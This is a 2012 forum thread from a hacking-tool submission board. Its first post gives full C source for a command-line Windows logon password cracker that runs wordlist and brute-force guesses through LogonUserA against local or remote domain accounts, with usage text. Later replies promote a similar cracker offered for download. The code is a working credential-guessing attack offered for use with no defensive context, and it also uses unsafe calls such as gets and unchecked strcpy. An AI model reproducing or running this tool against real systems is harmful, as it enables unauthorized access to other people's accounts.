Windows password cracker

Have a tool that you think is awesome enough to be promoted by Hackerthreads? Submit it in a thread here. This forum is write-only, like a drop-box, and you will not be able to see other threads.

Windows password cracker

Postby Jakash3 » Tue Aug 28, 2012 1:00 am

Command line tool for cracking windows passwords using wordlist or bruteforce.

Link with advapi32.lib:
Code: Select all
#include <Windows.h> #include <conio.h> #include <cstdio> #include <cstdlib> #include <cctype> void die(const char* format, ...) { va_list v; va_start(v, format); vfprintf(stderr, format, v); exit(1); } int logon(const char* user, const char* pass, const char* domain, bool showmsg) { DWORD ret = 1; HANDLE tok; char* msg; if (!LogonUserA(user,domain,pass,LOGON32_LOGON_NETWORK,LOGON32_PROVIDER_DEFAULT,&tok)) { ret = 0; if (showmsg) { ret = GetLastError(); FormatMessageA( FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, NULL, ret, NULL, (char*)&msg, 0, NULL ); puts(msg); LocalFree(msg); } } else { if (showmsg) puts("Success!"); } CloseHandle(tok); return ret; } void prompt() { char *domain, *user, *pass, *input; domain = (char*)malloc(256); user = (char*)malloc(256); pass = (char*)malloc(256); input = (char*)malloc(256); domain[0] = '.'; domain[1] = 0; for (;;) { fputs("-", stdout); gets(input); switch (input[0]) { case '?': puts( "Interactive mode commands:\n" "d DOMAIN Set domain (Use \".\" for local machine)\n" "u USER Set username\n" "p PASS Set password\n" "x Attempt logon\n" "q Quit\n" ); break; case 'd': strcpy(domain, input + 2); break; case 'u': strcpy(user, input + 2); break; case 'p': strcpy(pass, input + 2); break; case 'x': logon(user, pass, domain, true); break; case 'q': free(domain); free(user); free(pass); free(input); return; default: puts("Unknown command\n"); } } } struct pass_type { bool lcase; bool ucase; bool digit; bool punct; bool space; }; void brute(const char* user, struct pass_type * ptype, const char* domain) { char i; int j = 0, k; char * chrs, * pass; bool carry; chrs = (char*)malloc(100); pass = (char*)malloc(256); if (ptype->lcase) for (i = 'a'; i <= 'z'; i++, j++) chrs[j] = i; if (ptype->digit) for (i = '0'; i <= '9'; i++, j++) chrs[j] = i; if (ptype->space) chrs[j++] = ' '; if (ptype->ucase) for (i = 'A'; i <= 'Z'; i++, j++) chrs[j] = i; if (ptype->punct) for (i = 0x21; i < 0x7f; i++) if (ispunct(i)) chrs[j++] = i; for (k = 0; chrs[k]; k++); k--; chrs[j] = 0; pass[0] = chrs[0]; pass[1] = 0; puts("Press Enter anytime to stop. . ."); Sleep(1000); for (puts(pass); !logon(user, pass, domain, false); puts(pass)) { if (_kbhit()) if (_getch() == '\r') { free(chrs); free(pass); puts("\nStopped."); return; } i = 0; do { if (pass[i] == chrs[k]) { carry = true; pass[i] = chrs[0]; } else { carry = false; pass[i] = *(strchr(chrs, pass[i]) + 1); break; } } while (pass[++i]); if (carry) { j = strlen(pass); pass[j] = chrs[0]; pass[++j] = 0; } } puts("\nSuccess!"); return; } int main(int argc, char ** argv) { if (argc == 1) die( "wlpc - by Jakash3\n" "Windows Logon Password Cracker\n" "Usage: %s [username [-w wordfile | -b [-l -u -d -p -s]] [-d domain]] | -i \n\n" "-w wordfile Dictionary attack. Using file containing line by line passwords\n" "-b Bruteforce attack using one or more of the following switches:\n" " -l Include lowercase alphabetical characters.\n" " -u Include uppercase alphabetical characters.\n" " -n Include digit characters\n" " -p Include punctuation characters\n" " -s Include space\n" "username Name of user account to try logging in as\n" "-d domain Optional. Remote Domain or server holding the user account\n" "-i Interactive mode\n", argv[0] ); if (argc == 2 && !strcmp(argv[1], "-i")) { prompt(); return 0; } FILE* f; char *pass, *domain = ".", *wfile; bool bf = false; struct pass_type p; memset(&p, 0, sizeof(struct pass_type)); int i; for (i = 1; i < argc; i++) { if (!strcmp(argv[i], "-d")) domain = argv[++i]; else if (!strcmp(argv[i], "-i")) { prompt(); return 0; } else if (!strcmp(argv[i], "-w")) wfile = argv[++i]; else if (!strcmp(argv[i], "-b")) bf = true; else if (!strcmp(argv[i], "-l")) p.lcase = true; else if (!strcmp(argv[i], "-u")) p.ucase = true; else if (!strcmp(argv[i], "-n")) p.digit = true; else if (!strcmp(argv[i], "-p")) p.punct = true; else if (!strcmp(argv[i], "-s")) p.space = true; } if (bf) { brute(argv[1], &p, domain); return 0; } pass = (char*)malloc(256); if (!(f = fopen(wfile, "r"))) die("Failed to open %s\n", wfile); pass = (char*)malloc(256); puts("Press Enter anytime to stop. . ."); Sleep(1000); while (!feof(f)) { if (_kbhit()) if (_getch() == '\r') { fclose(f); free(pass); puts("\nStopped."); return 0; } if (!fgets(pass, 256, f)) break; *strpbrk(pass, "\r\n") = 0; puts(pass); if (logon(argv[1], pass, domain, false)) { puts("\nSuccess!"); fclose(f); free(pass); return 0; } } puts("\nEnd of file!"); fclose(f); free(pass); return 0; }
Jakash3
n00b
 
Posts: 1
Joined: Tue Aug 28, 2012 12:54 am

Re: Windows password cracker

Postby Grincheux » Sat Jul 04, 2015 2:31 pm

I wrote my own. http://www.phrio.biz/mediawiki/Cracker_V2
Try it is free.
Grincheux
n00b
 
Posts: 8
Joined: Mon Jun 29, 2015 12:00 pm

Re: Windows password cracker

Postby Cool_Fire » Mon Jul 06, 2015 9:57 am

I wrote my own. http://www.phrio.biz/mediawiki/Cracker_V2
Try it is free.
Could you make source available in a non-executable format? That way people who are a little hesitant to download and run arbitrary executables can download and compile the source.
If we're breaking the rules, then how come you can't catch us? You can't find us? I know why. Cause, it's ... MAGIC!
Hackerthreads chat, where the party is going 24/7.
User avatar
Cool_Fire
Not a sandwich
 
Posts: 1880
Joined: Fri May 09, 2003 1:20 pm
ICQ: 336613081
Website: https://www.insomnia247.nl/
Yahoo Messenger: cool_fire_666
AOL: EvilCoolFire
Location: 41 6d 73 74 65 72 64 61 6d

Re: Windows password cracker

Postby Grincheux » Mon Jul 06, 2015 2:12 pm

Source is available at here in 7zip format :razz:
Grincheux
n00b
 
Posts: 8
Joined: Mon Jun 29, 2015 12:00 pm


Return to ā€œ%sā€ Tool Submission

Who is online

Users browsing this forum: No registered users and 1 guest

cron